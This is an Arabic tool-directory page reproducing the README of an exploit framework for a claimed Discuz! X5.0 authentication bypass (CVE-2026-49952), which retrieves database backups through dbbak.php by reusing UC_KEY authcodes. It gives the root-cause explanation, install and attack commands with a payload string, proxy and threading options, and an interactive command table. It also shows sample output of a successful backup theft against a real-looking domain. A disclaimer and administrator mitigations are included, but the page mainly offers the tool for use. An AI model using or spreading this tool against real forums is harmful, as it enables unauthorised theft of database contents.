Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - ثغرة حرجة تسمح بالوصول إلى النسخ الاحتياطية لقاعدة البيانات دون مصادقة، عبر إعادة استخدام رمز أوراكل التشفيري UC_KEY. درجة الخطورة CVSS 9.1. أداة كاملة الميزات مع كشف الإصدار، وهجمات متعددة الحمولات، وقشرة تفاعلية، واستغلال آلي. للاختبارات المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
المصادقة والترخيصأطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubcerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

عرض المستودع
12منذ شهر واحدلم تتم المراجعة بعد

حول

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - ثغرة حرجة تسمح بالوصول إلى النسخ الاحتياطية لقاعدة البيانات دون مصادقة، عبر إعادة استخدام رمز أوراكل التشفيري UC_KEY. درجة الخطورة CVSS 9.1. أداة كاملة الميزات مع كشف الإصدار، وهجمات متعددة الحمولات، وقشرة تفاعلية، واستغلال آلي. للاختبارات المصرح بها فقط.

مشاركة

إطار عمل استغلال تجاوز المصادقة في Discuz! X5.0

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (حرجة) | الإصدار 1.0.0

أداة اختبار اختراق احترافية مصممة لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة في Discuz! X5.0.

D1

📋 جدول المحتويات

  • ⚠️ إخلاء المسؤولية

  • 🔍 نظرة عامة

  • 🎯 تفاصيل الثغرة

  • ✨ الميزات

  • 📦 التثبيت

  • 🚀 البدء السريع

  • 💻 أمثلة الاستخدام

  • 🖥️ الواجهة التفاعلية

  • 🛡️ اعتبارات أمنية

  • 🔧 استكشاف الأخطاء وإصلاحها

  • 📄 الترخيص


⚠️ إخلاء المسؤولية

إشعار هامهذه الأداة مقدمة لأغراض تعليمية ولاختبارات أمنية مصرح بها فقط.لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وغير أخلاقي.لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناجم عن هذه الأداة.باستخدامك لهذه الأداة، فإنك توافق على الامتثال لجميع القوانين واللوائح المعمول بها.


🔍 نظرة عامة

إطار عمل استغلال تجاوز المصادقة في Discuz! X5.0 مصمم لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة (CVE-2026-49952) في إصدارات Discuz! X5.0 الصادرة بين 20 مارس 2026 و1 مايو 2026.

تسمح هذه الثغرة للمهاجمين غير المصادقين بالوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات (dbbak.php) من خلال استغلال UC_KEY encryption oracle لإعادة استخدام الرمز المميز، مما قد يعرّض محتويات حساسة من قاعدة البيانات للخطر.

أبرز الملامح

  • 🏆 درجة CVSS: 9.1 (حرجة)

  • 🔐 التأثير: تجاوز المصادقة

  • 📂 الوصول: ملفات النسخ الاحتياطي لقاعدة البيانات

  • ⚡ التعقيد: منخفض (سهل الاستغلال)

  • 🎯 الهدف: Discuz! X5.0 (20260320 - 20260501)


🎯 تفاصيل الثغرة

الملخص الفني

السبب الجذري

توجد الثغرة في نقطة النهاية dbbak.php حيث تعتمد آلية التحقق من الرمز المميز على UC_KEY encryption oracle. من خلال صياغة حمولة محددة في طلب تسجيل الدخول (member.php)، يمكن للمهاجم الحصول على رمز مصادقة صالح يمكن إعادة استخدامه للوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات دون الحصول على تفويض مناسب.

الإصدارات المتأثرة

  • ❌ Discuz! X5.0 (20260320 - 20260501) - قابلة للاستغلال

  • ✅ Discuz! X5.0 (20260510+) - مُصلحة


✨ الميزات

الميزات الأساسية

  • 🔍 اكتشاف الإصدار: بصمة تلقائية وتحديد إصدار Discuz!.

  • ⚡ هجوم متعدد الحمولات: اختبار متوازٍ لعدة متغيرات من الحمولات.

  • 🖥️ واجهة تفاعلية: واجهة سطر أوامر كاملة الميزات للاستغلال اليدوي.

  • 🚀 استغلال آلي: استغلال بنقرة واحدة مع حد أدنى من الإعداد.

  • 📊 حفظ النتائج: تصدير نتائج الاستغلال إلى ملفات بختم زمني.

  • 🌐 دعم الوكيل (Proxy): إعداد وكيل HTTP/HTTPS للتنقل عبر الشبكة.

  • 🎯 فحص متعدد الخيوط: عدد خيوط قابل للضبط لتحسين الأداء.

  • 🎨 مخرجات ملونة: مخرجات طرفية احترافية مرمّزة بالألوان.

ميزات متقدمة

  • 🔐 دعم SSL/TLS: يتعامل مع أهداف HTTP وHTTPS.

  • 🔄 إدارة الجلسات: يحافظ على حالة جلسة مستمرة.

  • 📦 تخصيص الحمولة: دعم حقن حمولات مخصصة.

  • 🎯 التحقق من الهدف: يتحقق من تثبيت Discuz! قبل الاستغلال.


📦 التثبيت

المتطلبات الأساسية

  • Python: الإصدار 3.7 أو أحدث

  • Pip: مدير حزم Python

التثبيت من المصدر

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

التثبيت باستخدام Docker

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 البدء السريع

الاستخدام الأساسي

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

الاستخدام المتقدم

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 أمثلة الاستخدام

مثال 1: استغلال أساسي

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 المخرجات المتوقعة
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ الواجهة التفاعلية

ابدأ الواجهة التفاعلية للاستغلال اليدوي:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

الأوامر المتاحة


🛡️ اعتبارات أمنية

✅ الأمور المسموحة

  • استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

  • احصل على تفويض كتابي قبل الاختبار.

  • اتبع ممارسات الإفصاح المسؤول.

  • أبلغ الموردين بالثغرات بشكل صحيح.

  • استخدمها في بيئات معملية معزولة للتعلم.

❌ المحظورات

  • لا تستخدمها أبدًا ضد أنظمة الإنتاج دون تفويض.

  • لا تشارك البيانات المستغلة علنًا.

  • لا تستخدمها أبدًا في أنشطة غير قانونية أو سرقة بيانات.

  • لا تعدّل أو تحذف البيانات أثناء الاختبار.

  • لا تستغل أبدًا دون موافقة.

توصيات التخفيف

لمسؤولي الأنظمة:

  1. حدّث فورًا: قم بالترقية إلى Discuz! X5.0 (20260510+) أو أحدث.

  2. عطّل نقطة النهاية: عطّل dbbak.php مؤقتًا إذا لم تكن هناك حاجة إليها.

  3. راقب السجلات: ترقب الوصول المشبوه إلى member.php وdbbak.php.

  4. قواعد WAF: نفّذ قواعد جدار حماية تطبيقات الويب لحظر الطلبات الخبيثة.

  5. القائمة البيضاء للعناوين: قيّد الوصول إلى نقطة نهاية النسخ الاحتياطي على عناوين IP موثوقة.


🔧 استكشاف الأخطاء وإصلاحها

❌ أخطاء الاتصال
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 فشل المصادقة
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT.

حقوق النشر © 2026 Sudeepa Wanigarathna

يُمنح بموجب هذا الإذن مجانًا لأي شخص يحصل على نسخة من هذا البرنامج وملفات التوثيق المرتبطة به ("البرنامج")، للتعامل مع البرنامج دون أي قيود، بما في ذلك على سبيل المثال لا الحصر حقوق الاستخدام والنسخ والتعديل والدمج والنشر والتوزيع والترخيص الفرعي و/أو بيع نسخ من البرنامج، والسماح للأشخاص الذين يُسلَّم إليهم البرنامج بفعل ذلك، وفقًا للشروط التالية:

يجب تضمين إشعار حقوق النشر أعلاه وإشعار الإذن هذا في جميع النسخ أو الأجزاء الجوهرية من البرنامج.

يُقدَّم البرنامج "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق والملاءمة لغرض معين وعدم التعدي. لا يتحمل المؤلفون أو أصحاب حقوق النشر بأي حال من الأحوال المسؤولية عن أي مطالبة أو أضرار أو مسؤولية أخرى، سواء في إطار عقد أو ضرر أو غير ذلك، تنشأ عن أو تتعلق بالبرنامج أو باستخدامه أو التعاملات الأخرى معه.


المؤلف: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة!

🔐 استخدم بمسؤولية. حافظ على الأخلاقيات. واصل التعلم.

تنزيل الأداة
السمةالتفاصيل
نوع الثغرةتجاوز المصادقة
معرف CVECVE-2026-49952
إصدار CVSS3.1
درجة CVSS9.1 (حرجة)
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
تأثير السريةمرتفع
تأثير السلامةمرتفع
تأثير التوافرمرتفع
نضج كود الاستغلالوظيفي
مستوى المعالجةإصلاح رسمي متاح
الأمرالوصفالمثال
helpعرض جميع الأوامر المتاحةhelp
scanاكتشاف إصدار Discuz! والتحقق من الثغرةscan
get [payload]استخراج authcode (حمولة مخصصة اختيارية )`get admin
exploit [op]تنفيذ الاستغلال (الافتراضي: backup)exploit backup
saveحفظ النتائج في ملفsave
infoعرض معلومات الجلسةinfo
clearمسح شاشة الطرفيةclear
exit / quitالخروج من الواجهة التفاعليةexit